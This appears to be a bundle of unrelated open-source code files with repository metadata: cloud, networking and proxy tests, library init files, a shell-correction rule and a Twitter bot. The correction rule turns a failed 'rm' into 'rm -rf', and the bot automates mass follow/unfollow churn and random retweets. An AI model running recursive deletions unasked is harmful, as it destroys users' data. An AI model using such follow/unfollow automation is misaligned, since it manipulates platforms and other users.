"avg_line_length": 21.527272727272727,
"alnum_prop": 0.700168918918919,
"repo_name": "koenbok/Cactus",
"id": "730dbcfc39521741fb3a9283b9aa498dfce1fb51",
"size": "1184",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "cactus/tests/data/skeleton/plugins/sprites.disabled.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "261"
},
{
"name": "HTML",
"bytes": "8133"
},
{
"name": "JavaScript",
"bytes": "60"
},
{
"name": "Makefile",
"bytes": "448"
},
{
"name": "Python",
"bytes": "238893"
}
],
"symlink_target": ""
}
|
import typing
import revoke_dataset_access
import update_dataset_access
if typing.TYPE_CHECKING:
import pytest
from google.cloud import bigquery
def test_dataset_access_permissions(
capsys: "pytest.CaptureFixture[str]",
dataset_id: str,
entity_id: str,
bigquery_client: "bigquery.Client",
) -> None:
original_dataset = bigquery_client.get_dataset(dataset_id)
update_dataset_access.update_dataset_access(dataset_id, entity_id)
full_dataset_id = "{}.{}".format(
original_dataset.project, original_dataset.dataset_id
)
out, err = capsys.readouterr()
assert (
"Updated dataset '{}' with modified user permissions.".format(full_dataset_id)
in out
)
updated_dataset = bigquery_client.get_dataset(dataset_id)
updated_dataset_entries = list(updated_dataset.access_entries)
updated_dataset_entity_ids = {entry.entity_id for entry in updated_dataset_entries}
assert entity_id in updated_dataset_entity_ids
revoke_dataset_access.revoke_dataset_access(dataset_id, entity_id)
revoked_dataset = bigquery_client.get_dataset(dataset_id)
revoked_dataset_entries = list(revoked_dataset.access_entries)
full_dataset_id = f"{updated_dataset.project}.{updated_dataset.dataset_id}"
out, err = capsys.readouterr()
assert (
f"Revoked dataset access for '{entity_id}' to ' dataset '{full_dataset_id}.'"
in out
)
assert len(revoked_dataset_entries) == len(updated_dataset_entries) - 1
revoked_dataset_entity_ids = {entry.entity_id for entry in revoked_dataset_entries}
assert entity_id not in revoked_dataset_entity_ids
|
{
"content_hash": "e1096544b4877577fd4b5d9c0b131b3c",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 87,
"avg_line_length": 36.644444444444446,
"alnum_prop": 0.7077016373559734,
"repo_name": "googleapis/python-bigquery",
"id": "4d1a70eb1ede0c1f9d4bf0af184a48c7f53be373",
"size": "2225",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/snippets/dataset_access_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "2520564"
},
{
"name": "Shell",
"bytes": "31939"
}
],
"symlink_target": ""
}
|
import wpan
from wpan import verify
# -----------------------------------------------------------------------------------------------------------------------
# Test description: Router table
#
# Verify router table entries on a network with 4 routers:
# {r1, r2, r3} forming a loop with r4 connecting to r3.
#
test_name = __file__[:-3] if __file__.endswith('.py') else __file__
print('-' * 120)
print('Starting \'{}\''.format(test_name))
# -----------------------------------------------------------------------------------------------------------------------
# Creating `wpan.Nodes` instances
speedup = 4
wpan.Node.set_time_speedup_factor(speedup)
r1 = wpan.Node()
r2 = wpan.Node()
r3 = wpan.Node()
r4 = wpan.Node()
c4 = wpan.Node()
# -----------------------------------------------------------------------------------------------------------------------
# Init all nodes
wpan.Node.init_all_nodes()
# -----------------------------------------------------------------------------------------------------------------------
# Build network topology
#
#
# r1 ------ r2
# \ /
# \ /
# \ /
# r3 _____ r4
#
#
r1.form("route-table")
r1.whitelist_node(r2)
r2.whitelist_node(r1)
r2.join_node(r1, wpan.JOIN_TYPE_ROUTER)
r2.whitelist_node(r3)
r3.whitelist_node(r2)
r3.join_node(r2, wpan.JOIN_TYPE_ROUTER)
r3.whitelist_node(r1)
r1.whitelist_node(r3)
r3.whitelist_node(r4)
r4.whitelist_node(r3)
r4.join_node(r3, wpan.JOIN_TYPE_ROUTER)
# c4 is attached to r4 so that it quickly gets promoted to a router role.
c4.whitelist_node(r4)
r4.whitelist_node(c4)
c4.join_node(r4, wpan.JOIN_TYPE_SLEEPY_END_DEVICE)
c4.set(wpan.WPAN_POLL_INTERVAL, '2000')
# -----------------------------------------------------------------------------------------------------------------------
# Test implementation
#
verify(r1.get(wpan.WPAN_NODE_TYPE) == wpan.NODE_TYPE_LEADER)
verify(r2.get(wpan.WPAN_NODE_TYPE) == wpan.NODE_TYPE_ROUTER)
verify(r3.get(wpan.WPAN_NODE_TYPE) == wpan.NODE_TYPE_ROUTER)
verify(r4.get(wpan.WPAN_NODE_TYPE) == wpan.NODE_TYPE_ROUTER)
r1_id = int(r1.get(wpan.WPAN_THREAD_ROUTER_ID), 0)
r2_id = int(r2.get(wpan.WPAN_THREAD_ROUTER_ID), 0)
r3_id = int(r3.get(wpan.WPAN_THREAD_ROUTER_ID), 0)
r4_id = int(r4.get(wpan.WPAN_THREAD_ROUTER_ID), 0)
r1_ext_addr = r1.get(wpan.WPAN_EXT_ADDRESS)[1:-1]
r2_ext_addr = r2.get(wpan.WPAN_EXT_ADDRESS)[1:-1]
r3_ext_addr = r3.get(wpan.WPAN_EXT_ADDRESS)[1:-1]
r4_ext_addr = r4.get(wpan.WPAN_EXT_ADDRESS)[1:-1]
r1_rloc = int(r1.get(wpan.WPAN_THREAD_RLOC16), 16)
r2_rloc = int(r2.get(wpan.WPAN_THREAD_RLOC16), 16)
r3_rloc = int(r3.get(wpan.WPAN_THREAD_RLOC16), 16)
r4_rloc = int(r4.get(wpan.WPAN_THREAD_RLOC16), 16)
WAIT_TIME = 30 / speedup + 5
INVALID_ROUTER_ID = 63
def check_r1_router_table():
router_table = wpan.parse_router_table_result(
r1.get(wpan.WPAN_THREAD_ROUTER_TABLE))
verify(len(router_table) == 4)
for entry in router_table:
if entry.rloc16 == r1_rloc:
pass
elif entry.rloc16 == r2_rloc:
# r1 should be directly connected to r2.
verify(entry.is_link_established())
verify(entry.ext_address == r2_ext_addr)
elif entry.rloc16 == r3_rloc:
# r1 should be directly connected to r3.
verify(entry.is_link_established())
verify(entry.ext_address == r3_ext_addr)
elif entry.rloc16 == r4_rloc:
# r1's next hop towards r4 should be through r3.
verify(not entry.is_link_established())
verify(entry.next_hop == r3_id)
else:
raise (wpan.VerifyError("unknown entry in the router table of r1"))
wpan.verify_within(check_r1_router_table, WAIT_TIME)
def check_r3_router_table():
router_table = wpan.parse_router_table_result(
r3.get(wpan.WPAN_THREAD_ROUTER_TABLE))
verify(len(router_table) == 4)
for entry in router_table:
if entry.rloc16 == r1_rloc:
# r3 should be directly connected to r1.
verify(entry.is_link_established())
verify(entry.ext_address == r1_ext_addr)
elif entry.rloc16 == r2_rloc:
# r3 should be directly connected to r2.
verify(entry.is_link_established())
verify(entry.ext_address == r2_ext_addr)
elif entry.rloc16 == r3_rloc:
pass
elif entry.rloc16 == r4_rloc:
# r3 should be directly connected to r4.
verify(entry.is_link_established())
verify(entry.ext_address == r4_ext_addr)
else:
raise (wpan.VerifyError("unknown entry in the router table of r3"))
wpan.verify_within(check_r3_router_table, WAIT_TIME)
def check_r4_router_table():
router_table = wpan.parse_router_table_result(
r4.get(wpan.WPAN_THREAD_ROUTER_TABLE))
verify(len(router_table) == 4)
for entry in router_table:
if entry.rloc16 == r1_rloc:
# r4's next hop towards r1 should be through r3.
verify(not entry.is_link_established())
verify(entry.next_hop == r3_id)
elif entry.rloc16 == r2_rloc:
# r4's next hop towards r2 should be through r3.
verify(not entry.is_link_established())
verify(entry.next_hop == r3_id)
elif entry.rloc16 == r3_rloc:
# r4 should be directly connected to r3.
verify(entry.is_link_established())
verify(entry.ext_address == r3_ext_addr)
elif entry.rloc16 == r4_rloc:
pass
else:
raise (wpan.VerifyError("unknown entry in the router table of r4"))
wpan.verify_within(check_r4_router_table, WAIT_TIME)
# -----------------------------------------------------------------------------------------------------------------------
# Test finished
wpan.Node.finalize_all_nodes()
print('\'{}\' passed.'.format(test_name))
|
{
"content_hash": "0778641984e32d569e3babe865ca16f5",
"timestamp": "",
"source": "github",
"line_count": 178,
"max_line_length": 121,
"avg_line_length": 33.08426966292135,
"alnum_prop": 0.5515367634572933,
"repo_name": "lanyuwen/openthread",
"id": "41b98f53832d347f4acf126e103df0d393048548",
"size": "7492",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/toranj/test-020-router-table.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "10128"
},
{
"name": "C",
"bytes": "504489"
},
{
"name": "C#",
"bytes": "18077"
},
{
"name": "C++",
"bytes": "3008688"
},
{
"name": "M4",
"bytes": "42638"
},
{
"name": "Makefile",
"bytes": "77019"
},
{
"name": "Python",
"bytes": "1017946"
},
{
"name": "Ruby",
"bytes": "3397"
},
{
"name": "Shell",
"bytes": "17185"
}
],
"symlink_target": ""
}
|
from orangengine.drivers.base import BaseDriver
from orangengine.drivers.juniper_srx import JuniperSRXDriver
from orangengine.drivers.palo_alto_panorama import PaloAltoPanoramaDriver
from orangengine.drivers.palo_alto_base import PaloAltoBaseDriver
__all__ = ['BaseDriver', 'JuniperSRXDriver', 'PaloAltoPanoramaDriver', 'PaloAltoBaseDriver', ]
|
{
"content_hash": "27ce4d2e51161509deb2e8e048ae04c2",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 94,
"avg_line_length": 49.42857142857143,
"alnum_prop": 0.8352601156069365,
"repo_name": "lampwins/orangengine",
"id": "7f63e21a824a670a871302240794866c92bcef72",
"size": "370",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "orangengine/drivers/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "125410"
}
],
"symlink_target": ""
}
|
"""Some utilities that may help.
"""
from iterables import (iff, flatten, group, take, subsets,
variations, numbered_symbols, cartes, capture, any, all, dict_merge,
postorder_traversal, preorder_traversal, interactive_traversal,
prefixes, postfixes, sift)
from lambdify import lambdify
from source import source
from decorator import threaded, xthreaded, deprecated, wraps
from cythonutils import cythonized
from timeutils import timed
|
{
"content_hash": "0324f2e4297862f24811ec6fdf6be292",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 72,
"avg_line_length": 32.214285714285715,
"alnum_prop": 0.7804878048780488,
"repo_name": "pernici/sympy",
"id": "d8352fa34a262ca8d6b1a8f705bb6f96a30f04ac",
"size": "451",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sympy/utilities/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "6531741"
},
{
"name": "Scheme",
"bytes": "125"
},
{
"name": "TeX",
"bytes": "8"
},
{
"name": "XSLT",
"bytes": "366202"
}
],
"symlink_target": ""
}
|
import zstackwoodpecker.test_state as ts_header
import os
TestAction = ts_header.TestAction
def path():
return dict(initial_formation="template5", checking_point=1, faild_point=100000, path_list=[
[TestAction.create_mini_vm, 'vm1', 'cluster=cluster2'],
[TestAction.create_volume, 'volume1', 'cluster=cluster2', 'flag=scsi'],
[TestAction.attach_volume, 'vm1', 'volume1'],
[TestAction.create_volume_backup, 'volume1', 'volume1-backup1'],
[TestAction.create_mini_vm, 'vm2', 'cpu=random', 'cluster=cluster1'],
[TestAction.create_image_from_volume, 'vm2', 'vm2-image1'],
[TestAction.poweroff_only, 'cluster=cluster1'],
[TestAction.create_volume, 'volume2', 'cluster=cluster2', 'flag=scsi'],
[TestAction.attach_volume, 'vm1', 'volume2'],
[TestAction.create_volume, 'volume3', 'cluster=cluster1', 'flag=scsi'],
[TestAction.delete_volume, 'volume3'],
[TestAction.add_image, 'image2', 'root', 'http://172.20.1.28/mirror/diskimages/centos_vdbench.qcow2'],
[TestAction.create_volume, 'volume4', 'cluster=cluster1', 'flag=scsi'],
[TestAction.attach_volume, 'vm2', 'volume4'],
[TestAction.start_vm, 'vm2'],
[TestAction.create_volume_backup, 'volume4', 'volume4-backup2'],
[TestAction.stop_vm, 'vm2'],
[TestAction.delete_volume_backup, 'volume4-backup2'],
[TestAction.delete_image, 'vm2-image1'],
[TestAction.expunge_image, 'vm2-image1'],
[TestAction.start_vm, 'vm2'],
[TestAction.create_vm_backup, 'vm2', 'vm2-backup3'],
[TestAction.stop_vm, 'vm2'],
[TestAction.start_vm, 'vm2'],
[TestAction.reboot_vm, 'vm2'],
[TestAction.poweroff_only, 'cluster=cluster1'],
[TestAction.resize_volume, 'vm1', 5*1024*1024],
[TestAction.create_volume, 'volume5', 'size=random', 'cluster=cluster1', 'flag=scsi'],
[TestAction.create_volume, 'volume6', 'cluster=cluster2', 'flag=thick,scsi'],
[TestAction.delete_vm_backup, 'vm2-backup3'],
[TestAction.start_vm, 'vm1'],
[TestAction.stop_vm, 'vm1'],
[TestAction.expunge_volume, 'volume3'],
[TestAction.create_mini_vm, 'vm3', 'data_volume=true', 'cluster=cluster2'],
[TestAction.attach_volume, 'vm3', 'volume6'],
[TestAction.create_volume_backup, 'volume6', 'volume6-backup5'],
[TestAction.resize_data_volume, 'volume2', 5*1024*1024],
[TestAction.poweroff_only, 'cluster=cluster2'],
[TestAction.delete_volume_backup, 'volume6-backup5'],
])
'''
The final status:
Running:[]
Stopped:['vm2', 'vm1', 'vm3']
Enadbled:['volume1-backup1', 'image2']
attached:['volume1', 'volume2', 'volume4', 'auto-volume3', 'volume6']
Detached:['volume5']
Deleted:['volume4-backup2', 'vm2-backup3', 'volume4-backup3', 'volume6-backup5']
Expunged:['volume3', 'vm2-image1']
Ha:[]
Group:
'''
|
{
"content_hash": "7d1d223df724584536f2bfa461b5ac8b",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 104,
"avg_line_length": 42.983870967741936,
"alnum_prop": 0.6964352720450282,
"repo_name": "zstackio/zstack-woodpecker",
"id": "630d3af4668916d6c4d92f06d75c2f928c5f8b9b",
"size": "2665",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "integrationtest/vm/mini/multiclusters/paths/multi_path207.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2356"
},
{
"name": "Go",
"bytes": "49822"
},
{
"name": "Makefile",
"bytes": "687"
},
{
"name": "Puppet",
"bytes": "875"
},
{
"name": "Python",
"bytes": "13070596"
},
{
"name": "Shell",
"bytes": "177861"
}
],
"symlink_target": ""
}
|
import re
def match(command, settings):
return ('rm' in command.script
and 'is a directory' in command.stderr)
def get_new_command(command, settings):
return re.sub('^rm (.*)', 'rm -rf \\1', command.script)
|
{
"content_hash": "5fc4c39022308105d0498b05ef21da2f",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 59,
"avg_line_length": 25.555555555555557,
"alnum_prop": 0.6347826086956522,
"repo_name": "JensTimmerman/thefuck",
"id": "f9349ea45051156c96eead5875fdb777140119d5",
"size": "230",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "thefuck/rules/rm_dir.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19217"
}
],
"symlink_target": ""
}
|
import pytest
from mitmproxy.test.tflow import tflow
from mitmproxy.tools.console import defaultkeys, quickhelp
from mitmproxy.tools.console.eventlog import EventLog
from mitmproxy.tools.console.flowlist import FlowListBox
from mitmproxy.tools.console.flowview import FlowView
from mitmproxy.tools.console.grideditor import PathEditor
from mitmproxy.tools.console.help import HelpView
from mitmproxy.tools.console.keybindings import KeyBindings
from mitmproxy.tools.console.keymap import Keymap
from mitmproxy.tools.console.options import Options
from mitmproxy.tools.console.overlay import SimpleOverlay
@pytest.fixture(scope="module")
def keymap() -> Keymap:
km = Keymap(None)
defaultkeys.map(km)
return km
tflow2 = tflow()
tflow2.intercept()
tflow2.backup()
tflow2.marked = "x"
@pytest.mark.parametrize(
"widget, flow, is_root_widget",
[
(FlowListBox, None, False),
(FlowListBox, tflow(), False),
(FlowView, tflow2, True),
(KeyBindings, None, True),
(Options, None, True),
(HelpView, None, False),
(EventLog, None, True),
(PathEditor, None, False),
(SimpleOverlay, None, False),
]
)
def test_quickhelp(widget, flow, keymap, is_root_widget):
qh = quickhelp.make(widget, flow, is_root_widget)
for row in [qh.top_items, qh.bottom_items]:
for (title, v) in row.items():
if isinstance(v, quickhelp.BasicKeyHelp):
key_short = v.key
else:
b = keymap.binding_for_help(v)
if b is None:
raise AssertionError(f"No binding found for help text: {v}")
key_short = b.key_short()
assert len(key_short) + len(title) < 14
def test_make_rows():
keymap = Keymap(None)
defaultkeys.map(keymap)
# make sure that we don't crash if a default binding is missing.
keymap.unbind(keymap.binding_for_help("View event log"))
qh = quickhelp.make(HelpView, None, True)
assert qh.make_rows(keymap)
|
{
"content_hash": "15cdb1133a2ca173a41800deb48aca43",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 80,
"avg_line_length": 31.29230769230769,
"alnum_prop": 0.6691248770894789,
"repo_name": "mhils/mitmproxy",
"id": "958bf6ae40fd39cafe88f8e764da4366189b7745",
"size": "2034",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "test/mitmproxy/tools/console/test_quickhelp.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3618"
},
{
"name": "Dockerfile",
"bytes": "618"
},
{
"name": "HTML",
"bytes": "10672"
},
{
"name": "JavaScript",
"bytes": "134086"
},
{
"name": "Kaitai Struct",
"bytes": "3670"
},
{
"name": "Less",
"bytes": "21203"
},
{
"name": "PowerShell",
"bytes": "258"
},
{
"name": "Python",
"bytes": "2367991"
},
{
"name": "Shell",
"bytes": "3055"
},
{
"name": "TypeScript",
"bytes": "279053"
}
],
"symlink_target": ""
}
|
from a10sdk.common.A10BaseClass import A10BaseClass
class Stats(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param radius_response_dropped: {"description": "Query Response Dropped", "format": "counter", "type": "number", "oid": "11", "optional": true, "size": "8"}
:param radius_requst_sent: {"description": "Query Request Sent", "format": "counter", "type": "number", "oid": "8", "optional": true, "size": "8"}
:param radius_requst_dropped: {"description": "Query Request Dropped", "format": "counter", "type": "number", "oid": "9", "optional": true, "size": "8"}
:param request_insert_client_ip_performed: {"description": "HTTP Client IP Insertion Performed", "format": "counter", "type": "number", "oid": "3", "optional": true, "size": "8"}
:param radius_query_succeed: {"description": "MSISDN Query Succeed", "format": "counter", "type": "number", "oid": "6", "optional": true, "size": "8"}
:param request_insert_msisdn_unavailable: {"description": "Inserted MSISDN is 0000 (MSISDN Unavailable)", "format": "counter", "type": "number", "oid": "4", "optional": true, "size": "8"}
:param request_processed: {"description": "HTTP Request Processed", "format": "counter", "type": "number", "oid": "1", "optional": true, "size": "8"}
:param request_insert_msisdn_performed: {"description": "HTTP MSISDN Insertion Performed", "format": "counter", "type": "number", "oid": "2", "optional": true, "size": "8"}
:param radius_query_failed: {"description": "MSISDN Query Failed", "format": "counter", "type": "number", "oid": "7", "optional": true, "size": "8"}
:param queued_session_too_many: {"description": "Queued Session Exceed Drop", "format": "counter", "type": "number", "oid": "5", "optional": true, "size": "8"}
:param radius_response_received: {"description": "Query Response Received", "format": "counter", "type": "number", "oid": "10", "optional": true, "size": "8"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "stats"
self.DeviceProxy = ""
self.radius_response_dropped = ""
self.radius_requst_sent = ""
self.radius_requst_dropped = ""
self.request_insert_client_ip_performed = ""
self.radius_query_succeed = ""
self.request_insert_msisdn_unavailable = ""
self.request_processed = ""
self.request_insert_msisdn_performed = ""
self.radius_query_failed = ""
self.queued_session_too_many = ""
self.radius_response_received = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class HttpAlg(A10BaseClass):
"""Class Description::
Statistics for the object http-alg.
Class http-alg supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/cgnv6/http-alg/stats`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "http-alg"
self.a10_url="/axapi/v3/cgnv6/http-alg/stats"
self.DeviceProxy = ""
self.stats = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
|
{
"content_hash": "9fe21a23c1ccc4113c3e667924e6d910",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 191,
"avg_line_length": 47.1578947368421,
"alnum_prop": 0.6216517857142857,
"repo_name": "amwelch/a10sdk-python",
"id": "2245c562e2fb92d9aa4d48f6e420d6da257b084c",
"size": "3584",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "a10sdk/core/cgnv6/cgnv6_http_alg_stats.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "6956398"
}
],
"symlink_target": ""
}
|
import webapp2
import tweepy
import ConfigParser
from tweepy import *
from time import ctime, gmtime, mktime, strftime
import csv
import random
class BotHandler(webapp2.RequestHandler):
def runBot(self):
config = ConfigParser.RawConfigParser()
config.read('settings.cfg')
# http://dev.twitter.com/apps/myappid
CONSUMER_KEY = config.get('Twitter', 'CONSUMER_KEY')
CONSUMER_SECRET = config.get('Twitter', 'CONSUMER_SECRET')
# http://dev.twitter.com/apps/myappid/my_token
ACCESS_TOKEN_KEY = config.get('Twitter', 'ACCESS_TOKEN_KEY')
ACCESS_TOKEN_SECRET = config.get('Twitter', 'ACCESS_TOKEN_SECRET')
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
# If the authentication was successful, you should
# see the name of the account print out
#Iam = api.me().name
# Frequency calc
freq = random.randint(1, 100)
#freq = 3
if freq <= 5:
# Tweet a random quote
self.tweetQuote(api)
# Follow back a follower
##self.followBackFollower(api)
elif freq <= 30:
# Unfollow a non-follower
self.dropNonFollower(api)
elif freq <= 60:
# Add a random follower
self.addNewFollower(api)
else:
# RT
self.searchRT(api, config)
self.response.write(freq)
def tweet(self, api, theTweet):
api.update_status(theTweet)
def retweet(self, api, theTweetID):
print(theTweetID)
api.retweet(id=theTweetID)
def searchRT(self, api, config):
searchTerms = config.get('Twitter', 'SEARCH_TERMS')
termsList = searchTerms.split(",")
term = random.choice(termsList)
self.response.write(term)
results = api.search(term, "en")
#resultsSorted = sorted(results, key=lambda tweet: tweet.retweet_count, reverse=True)
randTweetNum = random.randint(0, len(results))
if results[randTweetNum]:
theTweet = results[randTweetNum].text
theTweetID = results[randTweetNum].id
#print(theTweet)
self.response.write(theTweet)
self.retweet(api, theTweetID)
def tweetQuote(self, api):
# read csv
with open('quotes.csv', 'rU') as f:
reader = csv.reader(f)
quotes = list(reader)
randQuoteNum = random.randint(0, len(quotes))
quote = quotes[randQuoteNum]
# Format quote
quoteText = quote[0]
quoteAuthor = quote[1]
# QuoteSource: Quote
quoteSource = ", "+ quote[2]
quoteWho = quote[3] +": " if quote[3] else ""
quoteHandle = quote[4]
theTweet = "\""+ quoteWho + quoteText +"\""+ quoteSource
# Tweet a quote
if len(theTweet) < 140:
self.tweet(api, theTweet)
self.response.write(theTweet)
def dropNonFollower(self, api):
myID = api.me().id
# Get followers
followersList = api.followers_ids(myID)
# Get friends
friendsList = api.friends_ids(myID)
# non-friend list
nonFollowerList = list(set(friendsList) - set(followersList))
if len(nonFollowerList) > 0:
#self.response.write(nonFollowerList)
# Get non-followers in descending order and pick the last one
nonFollowerID = nonFollowerList[-1]
#nonFollower = api.get_user(nonFollowerID)
if nonFollowerID:
nonFollower = api.destroy_friendship(nonFollowerID)
self.response.write(nonFollower)
def saveFollowers(self, api, config):
myID = api.me().id
# Get followers
followersList = api.followers_ids(myID)
# Mongo API keys
apiURL = config.get('Mongolab', 'apiURL')
apiKey = config.get('Mongolab', 'apiKey')
database = config.get('Mongolab', 'database')
# Set API call headers
headers = {'content-type': 'application/json'}
def followBackFollower(self, api):
myID = api.me().id
# Get followers
followersList = api.followers_ids(myID)
# Get friends
friendsList = api.friends_ids(myID)
# non-friend list
nonFollowingList = list(set(followersList) - set(friendsList))
# Find non-follwers and pick a random one
randNonFollowingID = random.choice(nonFollowingList)
#randNonFollowingID = nonFollowingList[random.randint(0, len(nonFollowingList)-1)]
#randNonFollowing = api.get_user(randNonFollowingID)
if randNonFollowingID:
randNonFollowing = api.create_friendship(randNonFollowingID)
self.response.write(randNonFollowing)
def addNewFollower(self, api):
myID = api.me().id
# Get followers
followerList = api.followers_ids(myID)
# Get a random follower
randFollowerID = followerList[random.randint(0, len(followerList)-1)]
# Get list of riends of the random follower
friendList = api.friends_ids(randFollowerID)
#newFollowerID = friendList[random.randint(0, len(friendList)-1)]
newFollowerID = random.choice(friendList)
#newFollower = api.get_user(newFollowerID)
if newFollowerID:
newFollower = api.create_friendship(newFollowerID)
self.response.write(newFollower)
def log(self, message):
timestamp = strftime("%Y %b %d %H:%M:%S UTC: ", gmtime())
print (timestamp + message + '\n')
def get(self):
try:
self.runBot()
print("Ran Bot")
except TweepError as te:
print te.message
app = webapp2.WSGIApplication([
('/bot', BotHandler)
], debug=False)
|
{
"content_hash": "153100ac65766a5e7ab1814b9377ad47",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 93,
"avg_line_length": 35.708333333333336,
"alnum_prop": 0.5957659609934989,
"repo_name": "fsiddiqi/quotedian",
"id": "9928dffc26d8ec47ff2bb2013b3eaecdadbbef3e",
"size": "6025",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bot.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "7951"
}
],
"symlink_target": ""
}
|
"""
Output for vt100 terminals.
A lot of thanks, regarding outputting of colors, goes to the Pygments project:
(We don't rely on Pygments anymore, because many things are very custom, and
everything has been highly optimized.)
http://pygments.org/
"""
from __future__ import unicode_literals
from prompt_toolkit.filters import to_simple_filter, Condition
from prompt_toolkit.layout.screen import Size
from prompt_toolkit.renderer import Output
from prompt_toolkit.styles import ANSI_COLOR_NAMES
from six.moves import range
import array
import errno
import os
import six
__all__ = (
'Vt100_Output',
)
FG_ANSI_COLORS = {
'ansidefault': 39,
'ansiblack': 30,
'ansidarkgray': 37,
'ansilightgray':90,
'ansiwhite': 97,
# Low intensity.
'ansidarkred': 31,
'ansidarkgreen': 32,
'ansibrown': 33,
'ansidarkblue': 34,
'ansipurple': 35,
'ansiteal': 36,
# High intensity.
'ansired': 91,
'ansigreen': 92,
'ansiyellow': 93,
'ansiblue': 94,
'ansifuchsia': 95,
'ansiturquoise': 96,
}
BG_ANSI_COLORS = {
'ansidefault': 49,
'ansiblack': 40,
'ansidarkgray': 47,
'ansiwhite': 107,
'ansilightgray': 100,
# Low intensity.
'ansidarkred': 41,
'ansidarkgreen': 42,
'ansibrown': 43,
'ansidarkblue': 44,
'ansipurple': 45,
'ansiteal': 46,
# High intensity.
'ansired': 101,
'ansigreen': 102,
'ansiyellow': 103,
'ansiblue': 104,
'ansifuchsia': 105,
'ansiturquoise': 106,
}
ANSI_COLORS_TO_RGB = {
'ansidefault': (0x00, 0x00, 0x00), # Don't use, 'default' doesn't really have a value.
'ansiblack': (0x00, 0x00, 0x00),
'ansidarkgray': (0x7f, 0x7f, 0x7f),
'ansiwhite': (0xff, 0xff, 0xff),
'ansilightgray': (0xe5, 0xe5, 0xe5),
# Low intensity.
'ansidarkred': (0xcd, 0x00, 0x00),
'ansidarkgreen': (0x00, 0xcd, 0x00),
'ansibrown': (0xcd, 0xcd, 0x00),
'ansidarkblue': (0x00, 0x00, 0xcd),
'ansipurple': (0xcd, 0x00, 0xcd),
'ansiteal': (0x00, 0xcd, 0xcd),
# High intensity.
'ansired': (0xff, 0x00, 0x00),
'ansigreen': (0x00, 0xff, 0x00),
'ansiyellow': (0xff, 0xff, 0x00),
'ansiblue': (0x00, 0x00, 0xff),
'ansifuchsia': (0xff, 0x00, 0xff),
'ansiturquoise': (0x00, 0xff, 0xff),
}
assert set(FG_ANSI_COLORS) == set(ANSI_COLOR_NAMES)
assert set(BG_ANSI_COLORS) == set(ANSI_COLOR_NAMES)
assert set(ANSI_COLORS_TO_RGB) == set(ANSI_COLOR_NAMES)
def _get_closest_ansi_color(r, g, b, exclude=()):
"""
Find closest ANSI color. Return it by name.
:param r: Red (Between 0 and 255.)
:param g: Green (Between 0 and 255.)
:param b: Blue (Between 0 and 255.)
:param exclude: A tuple of color names to exclude. (E.g. ``('ansired', )``.)
"""
assert isinstance(exclude, tuple)
# When we have a bit of saturation, avoid the gray-like colors, otherwise,
# too often the distance to the gray color is less.
saturation = abs(r - g) + abs(g - b) + abs(b - r) # Between 0..510
if saturation > 30:
exclude += ('ansilightgray', 'ansidarkgray', 'ansiwhite', 'ansiblack')
# Take the closest color.
# (Thanks to Pygments for this part.)
distance = 257*257*3 # "infinity" (>distance from #000000 to #ffffff)
match = 'ansidefault'
for name, (r2, g2, b2) in ANSI_COLORS_TO_RGB.items():
if name != 'ansidefault' and name not in exclude:
d = (r - r2) ** 2 + (g - g2) ** 2 + (b - b2) ** 2
if d < distance:
match = name
distance = d
return match
class _16ColorCache(dict):
"""
Cache which maps (r, g, b) tuples to 16 ansi colors.
:param bg: Cache for background colors, instead of foreground.
"""
def __init__(self, bg=False):
assert isinstance(bg, bool)
self.bg = bg
def get_code(self, value, exclude=()):
"""
Return a (ansi_code, ansi_name) tuple. (E.g. ``(44, 'ansiblue')``.) for
a given (r,g,b) value.
"""
key = (value, exclude)
if key not in self:
self[key] = self._get(value, exclude)
return self[key]
def _get(self, value, exclude=()):
r, g, b = value
match = _get_closest_ansi_color(r, g, b, exclude=exclude)
# Turn color name into code.
if self.bg:
